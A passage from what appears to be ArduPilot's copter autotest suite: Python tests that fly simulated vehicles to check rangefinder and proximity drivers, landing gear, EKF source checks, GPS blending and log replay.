self.change_mode("STABILIZE")
self.set_parameter("DISARM_DELAY", 0)
self.arm_vehicle()
self.set_parameter("SIM_IE24_ERROR", 30)
self.disarm_wait(timeout=1)
self.set_parameter("SIM_IE24_ERROR", 0)
self.set_parameter("DISARM_DELAY", 10)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_aux_switch_options(self):
self.set_parameter("RC7_OPTION", 58) # clear waypoints
self.load_mission("copter_loiter_to_alt.txt")
self.set_rc(7, 1000)
self.assert_mission_count(5)
self.progress("Clear mission")
self.set_rc(7, 2000)
self.delay_sim_time(1) # allow switch to debounce
self.assert_mission_count(0)
self.set_rc(7, 1000)
self.set_parameter("RC7_OPTION", 24) # reset mission
self.delay_sim_time(2)
self.load_mission("copter_loiter_to_alt.txt")
set_wp = 4
self.set_current_waypoint(set_wp)
self.wait_current_waypoint(set_wp, timeout=10)
self.progress("Reset mission")
self.set_rc(7, 2000)
self.delay_sim_time(1)
self.drain_mav()
self.wait_current_waypoint(0, timeout=10)
self.set_rc(7, 1000)
def test_aux_functions_in_mission(self):
self.load_mission("aux_functions.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_mode('ALT_HOLD')
self.change_mode('AUTO')
self.wait_rtl_complete()
def fly_rangefinder_drivers_fly(self, rangefinders):
'''ensure rangefinder gives height-above-ground'''
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
expected_alt = 5
self.user_takeoff(alt_min=expected_alt)
rf = self.mav.recv_match(type="RANGEFINDER", timeout=1, blocking=True)
if rf is None:
raise NotAchievedException("Did not receive rangefinder message")
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
if gpi is None:
raise NotAchievedException("Did not receive GLOBAL_POSITION_INT message")
if abs(rf.distance - gpi.relative_alt/1000.0) > 1:
raise NotAchievedException(
"rangefinder alt (%s) disagrees with global-position-int.relative_alt (%s)" %
(rf.distance, gpi.relative_alt/1000.0)
)
for i in range(0, len(rangefinders)):
name = rangefinders[i]
self.progress("i=%u (%s)" % (i, name))
ds = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=2,
blocking=True,
condition="DISTANCE_SENSOR.id==%u" % i
)
if ds is None:
raise NotAchievedException("Did not receive DISTANCE_SENSOR message for id==%u (%s)" % (i, name))
self.progress("Got: %s" % str(ds))
if abs(ds.current_distance/100.0 - gpi.relative_alt/1000.0) > 1:
raise NotAchievedException(
"distance sensor.current_distance (%f) (%s) disagrees with global-position-int.relative_alt (%s)" %
(ds.current_distance/100.0, name, gpi.relative_alt/1000.0))
self.land_and_disarm()
self.progress("Ensure RFND messages in log")
if not self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("No RFND messages in log")
def fly_proximity_mavlink_distance_sensor(self):
self.start_subtest("Test mavlink proximity sensor using DISTANCE_SENSOR messages") # noqa
self.context_push()
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("PRX_TYPE", 2) # mavlink
self.reboot_sitl()
self.progress("Should be unhealthy while we don't send messages")
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, False)
self.progress("Should be healthy while we're sending good messages")
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not come good")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
50, # max_distance cm
20, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
if self.sensor_has_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, True):
self.progress("Sensor has good state")
break
self.delay_sim_time(0.1)
self.progress("Should be unhealthy again if we stop sending messages")
self.delay_sim_time(1)
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, False)
# now make sure we get echoed back the same sorts of things we send:
# distances are in cm
distance_map = {
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE: 30,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_45: 35,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_90: 20,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_135: 15,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_180: 70,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_225: 80,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_270: 10,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_315: 90,
}
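            # each MAV_SENSOR_ROTATION_YAW_* above is one 45-degree
            # sector; the proximity library should echo each distance
            # back on DISTANCE_SENSOR in the matching orientation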
wanted_distances = copy.copy(distance_map)
sensor_enum = mavutil.mavlink.enums["MAV_SENSOR_ORIENTATION"]
def my_message_hook(mav, m):
if m.get_type() != 'DISTANCE_SENSOR':
return
self.progress("Got (%s)" % str(m))
want = distance_map[m.orientation]
got = m.current_distance
# ArduPilot's floating point conversions make it imprecise:
delta = abs(want-got)
if delta > 1:
self.progress(
"Wrong distance (%s): want=%f got=%f" %
(sensor_enum[m.orientation].name, want, got))
return
if m.orientation not in wanted_distances:
return
self.progress(
"Correct distance (%s): want=%f got=%f" %
(sensor_enum[m.orientation].name, want, got))
del wanted_distances[m.orientation]
self.install_message_hook_context(my_message_hook)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not give right distances") # noqa
for (orient, dist) in distance_map.items():
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
90, # max_distance cm
dist, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
orient, # orientation
255 # covariance
)
self.wait_heartbeat()
if len(wanted_distances.keys()) == 0:
break
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rangefinder_mavlink_distance_sensor(self):
self.start_subtest("Test mavlink rangefinder using DISTANCE_SENSOR messages")
self.context_push()
self.set_parameter('RTL_ALT_TYPE', 0)
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("RNGFND1_TYPE", 10)
self.reboot_sitl()
self.set_parameter("RNGFND1_MAX_CM", 32767)
self.progress("Should be unhealthy while we don't send messages")
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, False)
self.progress("Should be healthy while we're sending good messages")
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not come good")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance
50, # max_distance
20, # current_distance
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
if self.sensor_has_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, True):
self.progress("Sensor has good state")
break
self.delay_sim_time(0.1)
self.progress("Should be unhealthy again if we stop sending messages")
self.delay_sim_time(1)
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, False)
self.progress("Landing gear should deploy with current_distance below min_distance")
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_parameter("SERVO10_FUNCTION", 29)
self.set_parameter("LGR_DEPLOY_ALT", 1)
self.set_parameter("LGR_RETRACT_ALT", 10) # metres
            self.delay_sim_time(1) # servo function map is only periodically updated
# self.send_debug_trap()
self.run_cmd(
mavutil.mavlink.MAV_CMD_AIRFRAME_CONFIGURATION,
0,
0, # deploy
0,
0,
0,
0,
0
)
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
100, # min_distance (cm)
2500, # max_distance (cm)
200, # current_distance (cm)
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
self.context_collect("STATUSTEXT")
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 5:
raise NotAchievedException("Retraction did not happen")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
100, # min_distance (cm)
6000, # max_distance (cm)
1500, # current_distance (cm)
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
self.delay_sim_time(0.1)
try:
self.wait_text("LandingGear: RETRACT", check_context=True, timeout=0.1)
except Exception:
continue
self.progress("Retracted")
break
# self.send_debug_trap()
while True:
if self.get_sim_time_cached() - tstart > 5:
raise NotAchievedException("Deployment did not happen")
self.progress("Sending distance-sensor message")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
300, # min_distance
500, # max_distance
250, # current_distance
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
try:
self.wait_text("LandingGear: DEPLOY", check_context=True, timeout=0.1)
except Exception:
continue
self.progress("Deployed")
break
self.disarm_vehicle()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_gsf(self):
'''test the Gaussian Sum filter'''
ex = None
self.context_push()
try:
self.set_parameter("EK2_ENABLE", 1)
self.reboot_sitl()
self.takeoff(20, mode='LOITER')
self.set_rc(2, 1400)
self.delay_sim_time(5)
self.set_rc(2, 1500)
self.progress("Path: %s" % self.current_onboard_log_filepath())
dfreader = self.dfreader_for_current_onboard_log()
self.do_RTL()
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
# ensure log messages present
want = set(["XKY0", "XKY1", "NKY0", "NKY1"])
        still_want = set(want)  # copy, so we can track what remains
        while len(still_want):
            m = dfreader.recv_match(type=list(still_want))
            if m is None:
                raise NotAchievedException("Did not get %s" % still_want)
            still_want.discard(m.get_type())
def fly_rangefinder_mavlink(self):
self.fly_rangefinder_mavlink_distance_sensor()
        # explicit test for the mavlink driver as it doesn't play so nicely:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("RNGFND1_TYPE", 10)
self.customise_SITL_commandline(['--uartF=sim:rf_mavlink'])
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
expected_alt = 5
self.user_takeoff(alt_min=expected_alt)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Mavlink rangefinder not working")
rf = self.mav.recv_match(type="RANGEFINDER", timeout=1, blocking=True)
if rf is None:
raise NotAchievedException("Did not receive rangefinder message")
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
if gpi is None:
raise NotAchievedException("Did not receive GLOBAL_POSITION_INT message")
if abs(rf.distance - gpi.relative_alt/1000.0) > 1:
print("rangefinder alt (%s) disagrees with global-position-int.relative_alt (%s)" %
(rf.distance, gpi.relative_alt/1000.0))
continue
ds = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=2,
blocking=True,
)
if ds is None:
raise NotAchievedException("Did not receive DISTANCE_SENSOR message")
self.progress("Got: %s" % str(ds))
if abs(ds.current_distance/100.0 - gpi.relative_alt/1000.0) > 1:
print(
"distance sensor.current_distance (%f) disagrees with global-position-int.relative_alt (%s)" %
(ds.current_distance/100.0, gpi.relative_alt/1000.0))
continue
break
self.progress("mavlink rangefinder OK")
self.land_and_disarm()
def fly_rangefinder_driver_maxbotix(self):
ex = None
try:
self.context_push()
self.start_subtest("No messages")
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
if rf is not None:
raise NotAchievedException("Receiving DISTANCE_SENSOR when I shouldn't be")
self.start_subtest("Default address")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Explicitly set to default address")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.set_parameter("RNGFND1_ADDR", 0x70)
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Explicitly set to non-default address")
self.set_parameter("RNGFND1_ADDR", 0x71)
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Two MaxBotix RangeFinders")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.set_parameter("RNGFND1_ADDR", 0x70)
self.set_parameter("RNGFND1_MIN_CM", 150)
self.set_parameter("RNGFND2_TYPE", 2) # maxbotix
self.set_parameter("RNGFND2_ADDR", 0x71)
self.set_parameter("RNGFND2_MIN_CM", 250)
self.reboot_sitl()
self.do_timesync_roundtrip()
for i in [0, 1]:
rf = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=5,
blocking=True,
condition="DISTANCE_SENSOR.id==%u" % i
)
self.progress("Got id==%u (%s)" % (i, str(rf)))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
expected_dist = 150
if i == 1:
expected_dist = 250
if rf.min_distance != expected_dist:
raise NotAchievedException("Unexpected min_cm (want=%u got=%u)" %
(expected_dist, rf.min_distance))
self.context_pop()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rangefinder_drivers(self):
self.set_parameter("RTL_ALT", 500)
self.set_parameter("RTL_ALT_TYPE", 1)
drivers = [
("lightwareserial", 8), # autodetected between this and -binary
("lightwareserial-binary", 8),
("ulanding_v0", 11),
("ulanding_v1", 11),
("leddarone", 12),
("maxsonarseriallv", 13),
("nmea", 17),
("wasp", 18),
("benewake_tf02", 19),
("blping", 23),
("benewake_tfmini", 20),
("lanbao", 26),
("benewake_tf03", 27),
("gyus42v2", 31),
]
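        # SITL offers three spare UARTs (--uartE/F/G map to
        # SERIAL4/5/6 below), so exercise the serial drivers in
        # batches of three: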
while len(drivers):
do_drivers = drivers[0:3]
drivers = drivers[3:]
command_line_args = []
for (offs, cmdline_argument, serial_num) in [(0, '--uartE', 4),
(1, '--uartF', 5),
(2, '--uartG', 6)]:
if len(do_drivers) > offs:
(sim_name, rngfnd_param_value) = do_drivers[offs]
command_line_args.append("%s=sim:%s" %
(cmdline_argument, sim_name))
serial_param_name = "SERIAL%u_PROTOCOL" % serial_num
self.set_parameter(serial_param_name, 9) # rangefinder
self.set_parameter("RNGFND%u_TYPE" % (offs+1), rngfnd_param_value)
self.customise_SITL_commandline(command_line_args)
self.fly_rangefinder_drivers_fly([x[0] for x in do_drivers])
self.fly_rangefinder_mavlink()
i2c_drivers = [
("maxbotixi2cxl", 2),
]
while len(i2c_drivers):
do_drivers = i2c_drivers[0:9]
i2c_drivers = i2c_drivers[9:]
count = 1
for d in do_drivers:
(sim_name, rngfnd_param_value) = d
self.set_parameter("RNGFND%u_TYPE" % count, rngfnd_param_value)
count += 1
self.reboot_sitl()
self.fly_rangefinder_drivers_fly([x[0] for x in do_drivers])
def fly_ship_takeoff(self):
# test ship takeoff
self.wait_groundspeed(0, 2)
self.set_parameter("SIM_SHIP_ENABLE", 1)
self.set_parameter("SIM_SHIP_SPEED", 10)
self.set_parameter("SIM_SHIP_DSIZE", 2)
self.wait_ready_to_arm()
# we should be moving with the ship
self.wait_groundspeed(9, 11)
self.takeoff(10)
# above ship our speed drops to 0
self.wait_groundspeed(0, 2)
self.land_and_disarm()
# ship will have moved on, so we land on the water which isn't moving
self.wait_groundspeed(0, 2)
def test_parameter_validation(self):
# wait 10 seconds for initialisation
self.delay_sim_time(10)
self.progress("invalid; min must be less than max:")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 50)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; min must be less than max (equal case):")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 100)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; both must be non-zero or both zero (min=0)")
self.set_parameter("MOT_PWM_MIN", 0)
self.set_parameter("MOT_PWM_MAX", 100)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; both must be non-zero or both zero (max=0)")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 0)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
def test_alt_estimate_prearm(self):
self.context_push()
ex = None
try:
# disable barometer so there is no altitude source
self.set_parameter("SIM_BARO_DISABLE", 1)
self.set_parameter("SIM_BARO2_DISABL", 1)
self.wait_gps_disable(position_vertical=True)
# turn off arming checks (mandatory arming checks will still be run)
self.set_parameter("ARMING_CHECK", 0)
# delay 12 sec to allow EKF to lose altitude estimate
self.delay_sim_time(12)
self.change_mode("ALT_HOLD")
self.assert_prearm_failure("Need Alt Estimate")
# force arm vehicle in stabilize to bypass barometer pre-arm checks
self.change_mode("STABILIZE")
self.arm_vehicle()
self.set_rc(3, 1700)
try:
self.change_mode("ALT_HOLD", timeout=10)
except AutoTestTimeoutException:
self.progress("PASS not able to set mode without Position : %s" % "ALT_HOLD")
            # check that mode change to ALT_HOLD has failed (as it should)
if self.mode_is("ALT_HOLD"):
raise NotAchievedException("Changed to ALT_HOLD with no altitude estimate")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
if ex is not None:
raise ex
def test_ekf_source(self):
self.context_push()
ex = None
try:
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.wait_ready_to_arm()
self.start_subtest("bad yaw source")
self.set_parameter("EK3_SRC3_YAW", 17)
self.assert_prearm_failure("Check EK3_SRC3_YAW")
self.context_push()
self.start_subtest("missing required yaw source")
self.set_parameter("EK3_SRC3_YAW", 3) # External Yaw with Compass Fallback
self.set_parameter("COMPASS_USE", 0)
self.set_parameter("COMPASS_USE2", 0)
self.set_parameter("COMPASS_USE3", 0)
self.assert_prearm_failure("EK3 sources require Compass")
self.context_pop()
except Exception as e:
self.disarm_vehicle(force=True)
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_replay_gps_bit(self):
self.set_parameters({
"LOG_REPLAY": 1,
"LOG_DISARMED": 1,
"EK3_ENABLE": 1,
"EK2_ENABLE": 1,
"AHRS_TRIM_X": 0.01,
"AHRS_TRIM_Y": -0.03,
"GPS_TYPE2": 1,
"GPS_POS1_X": 0.1,
"GPS_POS1_Y": 0.2,
"GPS_POS1_Z": 0.3,
"GPS_POS2_X": -0.1,
"GPS_POS2_Y": -0.02,
"GPS_POS2_Z": -0.31,
"INS_POS1_X": 0.12,
"INS_POS1_Y": 0.14,
"INS_POS1_Z": -0.02,
"INS_POS2_X": 0.07,
"INS_POS2_Y": 0.012,
"INS_POS2_Z": -0.06,
"RNGFND1_TYPE": 1,
"RNGFND1_PIN": 0,
"RNGFND1_SCALING": 30,
"RNGFND1_POS_X": 0.17,
"RNGFND1_POS_Y": -0.07,
"RNGFND1_POS_Z": -0.005,
"SIM_SONAR_SCALE": 30,
"SIM_GPS2_DISABLE": 0,
})
self.reboot_sitl()
current_log_filepath = self.current_onboard_log_filepath()
self.progress("Current log path: %s" % str(current_log_filepath))
self.change_mode("LOITER")
self.wait_ready_to_arm(require_absolute=True)
self.arm_vehicle()
self.takeoffAndMoveAway()
self.do_RTL()
self.reboot_sitl()
return current_log_filepath
def test_replay_beacon_bit(self):
self.set_parameter("LOG_REPLAY", 1)
self.set_parameter("LOG_DISARMED", 1)
old_onboard_logs = sorted(self.log_list())
self.fly_beacon_position()
new_onboard_logs = sorted(self.log_list())
log_difference = [x for x in new_onboard_logs if x not in old_onboard_logs]
return log_difference[2]
def test_replay_optical_flow_bit(self):
self.set_parameter("LOG_REPLAY", 1)
self.set_parameter("LOG_DISARMED", 1)
old_onboard_logs = sorted(self.log_list())
self.fly_optical_flow_limits()
new_onboard_logs = sorted(self.log_list())
log_difference = [x for x in new_onboard_logs if x not in old_onboard_logs]
print("log difference: %s" % str(log_difference))
return log_difference[0]
def test_gps_blending(self):
'''ensure we get dataflash log messages for blended instance'''
self.context_push()
ex = None
try:
# configure:
self.set_parameter("GPS_TYPE2", 1)
self.set_parameter("SIM_GPS2_TYPE", 1)
self.set_parameter("SIM_GPS2_DISABLE", 0)
self.set_parameter("GPS_AUTO_SWITCH", 2)
self.reboot_sitl()
# ensure we're seeing the second GPS:
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 60:
raise NotAchievedException("Did not get good GPS2_RAW message")
m = self.mav.recv_match(type='GPS2_RAW', blocking=True, timeout=1)
self.progress("%s" % str(m))
if m is None:
continue
if m.lat == 0:
continue
break
# create a log we can expect blended data to appear in:
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.delay_sim_time(5)
self.disarm_vehicle()
# inspect generated log for messages:
dfreader = self.dfreader_for_current_onboard_log()
wanted = set([0, 1, 2])
while True:
m = dfreader.recv_match(type="GPS") # disarmed
if m is None:
break
try:
wanted.remove(m.I)
except KeyError:
continue
if len(wanted) == 0:
break
if len(wanted):
raise NotAchievedException("Did not get all three GPS types")
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_callisto(self):
self.customise_SITL_commandline(
["--defaults", ','.join(self.model_defaults_filepath('ArduCopter', 'Callisto')), ],
model="octa-quad:@ROMFS/models/Callisto.json",
wipe=True,
)
self.takeoff(10)
self.do_RTL()
def fly_each_frame(self):
vinfo = vehicleinfo.VehicleInfo()
copter_vinfo_options = vinfo.options[self.vehicleinfo_key()]
known_broken_frames = {
'cwx': "missing defaults file",
'deca-cwx': 'missing defaults file',
'djix': "missing defaults file",
'heli-compound': "wrong binary, different takeoff regime",
'heli-dual': "wrong binary, different takeoff regime",
'heli': "wrong binary, different takeoff regime",
'hexa-cwx': "does not take off",
'hexa-dji': "does not take off",
'octa-quad-cwx': "does not take off",
'tri': "does not take off",
}
for frame in sorted(copter_vinfo_options["frames"].keys()):
self.start_subtest("Testing frame (%s)" % str(frame))
if frame in known_broken_frames:
self.progress("Actually, no I'm not - it is known-broken (%s)" %
(known_broken_frames[frame]))
continue
frame_bits = copter_vinfo_options["frames"][frame]
print("frame_bits: %s" % str(frame_bits))
if frame_bits.get("external", False):
self.progress("Actually, no I'm not - it is an external simulation")
continue
model = frame_bits.get("model", frame)
# the model string for Callisto has crap in it.... we
# should really have another entry in the vehicleinfo data
# to carry the path to the JSON.
actual_model = model.split(":")[0]
defaults = self.model_defaults_filepath("ArduCopter", actual_model)
if type(defaults) != list:
defaults = [defaults]
self.customise_SITL_commandline(
["--defaults", ','.join(defaults), ],
model=model,
wipe=True,
)
self.takeoff(10)
self.do_RTL()
def test_replay(self):
'''test replay correctness'''
self.progress("Building Replay")
util.build_SITL('tools/Replay', clean=False, configure=False)
self.test_replay_bit(self.test_replay_gps_bit)
self.test_replay_bit(self.test_replay_beacon_bit)
self.test_replay_bit(self.test_replay_optical_flow_bit)
def test_replay_bit(self, bit):
self.context_push()
current_log_filepath = bit()
self.progress("Running replay on (%s)" % current_log_filepath)
util.run_cmd(['build/sitl/tools/Replay', current_log_filepath],
directory=util.topdir(), checkfail=True, show=True)
self.context_pop()
replay_log_filepath = self.current_onboard_log_filepath()
self.progress("Replay log path: %s" % str(replay_log_filepath))
check_replay = util.load_local_module("Tools/Replay/check_replay.py")
ok = check_replay.check_log(replay_log_filepath, self.progress, verbose=True)
if not ok:
raise NotAchievedException("check_replay failed")
def test_copter_gps_zero(self):
# https://github.com/ArduPilot/ardupilot/issues/14236
self.progress("arm the vehicle and takeoff in Guided")
self.takeoff(20, mode='GUIDED')
self.progress("fly 50m North (or whatever)")
old_pos = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
self.fly_guided_move_global_relative_alt(50, 0, 20)
self.set_parameter('GPS_TYPE', 0)
self.drain_mav()
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 30 and self.mode_is('LAND'):
self.progress("Bug not reproduced")
break
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
self.progress("Received (%s)" % str(m))
if m is None:
raise NotAchievedException("No GLOBAL_POSITION_INT?!")
pos_delta = self.get_distance_int(old_pos, m)
self.progress("Distance: %f" % pos_delta)
if pos_delta < 5:
raise NotAchievedException("Bug reproduced - returned to near origin")
self.wait_disarmed()
self.reboot_sitl()
# a wrapper around all the 1A,1B,1C..etc tests for travis
def tests1(self):
ret = ([])
ret.extend(self.tests1a())
ret.extend(self.tests1b())
ret.extend(self.tests1c())
ret.extend(self.tests1d())
ret.extend(self.tests1e())
return ret
def tests1a(self):
'''return list of all tests'''
ret = super(AutoTestCopter, self).tests() # about 5 mins and ~20 initial tests from autotest/common.py
ret.extend([
("NavDelayTakeoffAbsTime",
"Fly Nav Delay (takeoff)",
self.fly_nav_takeoff_delay_abstime), # 19s
("NavDelayAbsTime",
"Fly Nav Delay (AbsTime)",
self.fly_nav_delay_abstime), # 20s
("NavDelay",
"Fly Nav Delay",
self.fly_nav_delay), # 19s
("GuidedSubModeChange",
"Test submode change",
self.fly_guided_change_submode),
("LoiterToAlt",
"Loiter-To-Alt",
self.fly_loiter_to_alt), # 25s
("PayLoadPlaceMission",
"Payload Place Mission",
self.fly_payload_place_mission), # 44s
("PrecisionLoiterCompanion",
"Precision Loiter (Companion)",
self.fly_precision_companion), # 29s
("PrecisionLandingSITL",
"Precision Landing (SITL)",
self.fly_precision_sitl), # 29s
("SetModesViaModeSwitch",
"Set modes via modeswitch",
self.test_setting_modes_via_modeswitch),
("SetModesViaAuxSwitch",
"Set modes via auxswitch",
self.test_setting_modes_via_auxswitch),
("AuxSwitchOptions",
"Test random aux mode options",
self.test_aux_switch_options),
("AuxFunctionsInMission",
"Test use of auxilliary functions in missions",
self.test_aux_functions_in_mission),
("AutoTune",
"Fly AUTOTUNE mode",
self.fly_autotune), # 73s
])
return ret
def tests1b(self):
'''return list of all tests'''
ret = ([
("ThrowMode", "Fly Throw Mode", self.fly_throw_mode),
("BrakeMode", "Fly Brake Mode", self.fly_brake_mode),
("RecordThenPlayMission",
"Use switches to toggle in mission, then fly it",
self.fly_square), # 27s
("ThrottleFailsafe",
"Test Throttle Failsafe",
self.fly_throttle_failsafe), # 173s
("GCSFailsafe",
"Test GCS Failsafe",
self.fly_gcs_failsafe), # 239s
# this group has the smallest runtime right now at around
            # 5mins, so add more tests here, till it's around
# 9-10mins, then make a new group
])
return ret
def tests1c(self):
'''return list of all tests'''
ret = ([
("BatteryFailsafe",
"Fly Battery Failsafe",
self.fly_battery_failsafe), # 164s
("StabilityPatch",
"Fly stability patch",
lambda: self.fly_stability_patch(30)), # 17s
("OBSTACLE_DISTANCE_3D",
"Test proximity avoidance slide behaviour in 3D",
self.OBSTACLE_DISTANCE_3D), # ??s
("AC_Avoidance_Proximity",
"Test proximity avoidance slide behaviour",
self.fly_proximity_avoidance_test), # 41s
("AC_Avoidance_Fence",
"Test fence avoidance slide behaviour",
self.fly_fence_avoidance_test),
("AC_Avoidance_Beacon",
"Test beacon avoidance slide behaviour",
self.fly_beacon_avoidance_test), # 28s
("BaroWindCorrection",
"Test wind estimation and baro position error compensation",
self.fly_wind_baro_compensation),
("SetpointGlobalPos",
"Test setpoint global position",
self.test_set_position_global_int),
("SetpointGlobalVel",
"Test setpoint global velocity",
self.test_set_velocity_global_int),
("SplineTerrain",
"Test Splines and Terrain",
self.test_terrain_spline_mission),
])
return ret
def tests1d(self):
'''return list of all tests'''
ret = ([
("HorizontalFence",
"Test horizontal fence",
self.fly_fence_test), # 20s
("HorizontalAvoidFence",
"Test horizontal Avoidance fence",
self.fly_fence_avoid_test),
("MaxAltFence",
"Test Max Alt Fence",
self.fly_alt_max_fence_test), # 26s
("MinAltFence",
"Test Min Alt Fence",
self.fly_alt_min_fence_test), # 26s
("FenceFloorEnabledLanding",
"Test Landing with Fence floor enabled",
self.fly_fence_floor_enabled_landing),
("AutoTuneSwitch",
"Fly AUTOTUNE on a switch",
self.fly_autotune_switch), # 105s
("GPSGlitchLoiter",
"GPS Glitch Loiter Test",
self.fly_gps_glitch_loiter_test), # 30s
("GPSGlitchAuto",
"GPS Glitch Auto Test",
self.fly_gps_glitch_auto_test),
("ModeAltHold",
"Test AltHold Mode",
self.test_mode_ALT_HOLD),
("ModeLoiter",
"Test Loiter Mode",
self.loiter),
("SimpleMode",
"Fly in SIMPLE mode",
self.fly_simple),
("SuperSimpleCircle",
"Fly a circle in SUPER SIMPLE mode",
self.fly_super_simple), # 38s
("ModeCircle",
"Fly CIRCLE mode",
self.fly_circle), # 27s
